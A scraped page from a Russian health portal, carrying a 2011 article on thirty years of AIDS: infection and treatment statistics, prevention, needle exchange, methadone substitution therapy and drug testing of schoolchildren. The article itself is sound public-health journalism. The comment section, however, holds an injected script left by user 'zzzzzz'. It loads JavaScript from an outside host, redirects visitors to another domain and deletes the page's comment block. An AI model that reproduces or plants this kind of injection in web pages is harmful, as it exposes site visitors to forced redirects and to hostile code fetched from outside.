Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  30 лет СПИДу: лечить нель...  >>  30 лет СПИДу: лечить нельзя, жить можно
 
Обратная связь
 

30 лет СПИДу: лечить нельзя, жить можно

Размер шрифта
08 июня 2011 13:22
  • google_analytics: false
  • Нравится

Тридцать лет СПИД гуляет по планете. Тридцать миллионов жизней потеряно. Какова ситуация сегодня, чему научила нас эта борьба, что будет дальше – все эти темы будут обсуждаться в ходе специальной сессии генеральной ассамблеи ООН в Нью-Йорке, посвященной борьбе с ВИЧ/СПИД, которая открывается сегодня.

СПИД: лечить нельзя, жить можно

Екатерина Олейникова / «Здоровье-инфо»

Немного цифр

В 2001 году число заболевших ВИЧ было 19 миллионов человек.
Сегодня это уже 33 миллионов человек.

В 2001 году расходы всего мира на лечение этого заболевания составили 300 млн долларов.
Сегодня на лечение тратится уже 17 млрд долларов.

2,2 миллионов носителей ВИЧ проживают на территории Европы и России, из них 1,4 приходится на территорию РФ и Восточную Европу.

В 2010 году в России было зарегистрировано 58 тысяч новых заболевших. Во Франции – 5 тысяч, в Германии – 3.

В Украине и Эстонии и России на долю взрослого населения приходится 1% заболевших. В Центральной Азии и Центральной Европе – меньше 0,1%.

В Западной Европе 70% человек, входящих в группу риска, участвуют в программах профилактики, так называемых программах по снижению вреда.
В РФ – меньше 5%. А заместительная терапия, одна из эффективных мер профилактики, у нас вообще запрещена законом.

В Восточном регионе и Центральной Азии лечение проходят 20% всего населения. У тех, кто его получает, вирусная нагрузка снижается, соответственно, вирус не может легко переходить от человека к человеку.
В РФ меньше 70 тысяч человек проходят лечение в 2009 году, в этом году предположительная цифра – более 100 тысяч. 20% бросают курс на половине пути.

За минувшие 30 лет от ВИЧ умерло 30 миллионов человек.

 

СПИД: лечить нельзя, жить можно

Профилактика – ключ к решению проблемы

Профилактика возможна в том случае, если человек понимает, что подвергает себя риску. А в нашем регионе такой уровень осознания довольно низок. Молодые люди в Западной Европе знают о ВИЧ, мы по какой-то причине – нет. Странно звучит, однако, это факт: молодым людям надо напоминать о презервативе. Удивительно, но среди носителей ВИЧ есть те, кто ни разу не слышал о такой возможности.

Та же ситуация с теми, кто входит в группу риска. Они сами должны понимать, что государство не придет к ним в постель, не возьмет за руку с инъекционным наркотиком. Государство, в свою очередь, не должно подвергать этих людей дискриминации, иначе они уйдут «на дно», и тогда обо всякой профилактике можно будет забыть. Эпидемия будет только набирать обороты.

78% заразились ВИЧ через употребление наркотиков. И если нельзя отучить наркомана колоться, то можно его хотя бы обеспечить чистым шприцом, чтобы он не передавал эстафету своей болезни дальше. К сожалению, и этот вопрос, по словам Владимира Николаевича Ибрагимова, главы Представительства Управления ООН по наркотикам и преступности, рассматривается в РФ «мягко скажем, без энтузиазма».

«Нет излечивания, есть только лечение»

Когда люди начинают получать лечение, их иммунитет перестает падать, и они защищены от инфекций, от которых, собственно, и погибает носитель ВИЧ. Лечение замедляет распространение вируса по организму, не убивая его окончательно.

В настоящее время 12 миллионов людей нуждаются в лечении, и только 6 миллионов имеют к нему доступ.

Стоимость лекарства варьируется от страны к стране. Пациенты получают не одно лекарство, а целый набор, чтобы не было привыкания. Тем не менее количество побочных эффектов занимает газетный разворот.

Один и тот же курс будет стоить 12 тысяч долларов в Германии, в России курс будет стоить 5 тысяч долларов, в Индии – 800 долларов. Для того, чтобы вылечить ребенка с ВИЧ, вы отдадите 100 долларов в Африке, несколько тысяч долларов в России, а в Америке человек заплатит и того больше.

СПИД: лечить нельзя, жить можно

Заместительная терапия – да или нет?

По своему принципу заместительная терапия похожа на жевательную резинку с никотином. Человек продолжает получать никотин, однако перестает курить. Точно так же и на метадоне люди зависят от опиатов, но перестают колоться, а значит, снижается риск заражения ВИЧ, гепатитом B, C.

Тем не менее Российская Федерация, несмотря на успешный опыт других стран, занимает другую позицию в этом вопросе: искоренить опиаты вообще, ни о какой заместительной терапии не может быть и речи.

«Школьников можно тестировать в ходе всеобщей обязательной диспансеризации»

По мнению Ибрагимова, не важно, обязательным будет тестирование или добровольным. В любом случае, ребенок, от него отказавшийся, становится отверженным, и любая школа найдет способ от него избавиться. Провести этот анализ достаточно просто: в ходе обязательной диспансеризации взять анализ мочи на содержание в ней остаточных веществ. Современные технологии позволяют отследить употребление тех или иных веществ за год!

Однако вопрос совсем в другом: чтобы этот механизм противодействия наркомании заработал, необходим комплексный подход. Дискретность, чистота проведения теста. Одна ошибка – и ребенку сломали всю жизнь. Что делать дальше с теми, у кого нашли в моче остаточные вещества? Загонять в отдельную секцию? Дальше-то что? Так что если принимать такой метод борьбы к действию, нужно сначала продумать весь комплекс мероприятий, необходимых для нормального тестирования на употребление наркотиков.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все что вы хотели знать о презервативах   Всемирная неделя первичного иммунодефицита начинается в Москве!   Как не стать жертвой голубей-убийц?!   В России появились клинические рекомендации по терапии больных первичным иммунодефицитом  
10 сентября 2012Одобрено лекарство для профилактики ВИЧ-инфекции! 24 августа 2012Домашний тест на ВИЧ
 
12 июля 2012Грудное молоко предотвращает передачу ВИЧ 14 февраля 2012Новую вакцину против ВИЧ-инфекции протестировали на людях
 

Слайдшоу

Все факты и мифы о ВИЧ Жизнь с диагнозом ВИЧ или СПИД: правда и вымыслы
Факты о заболеваниях, передающиеся половым путем Обследования для женщин
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.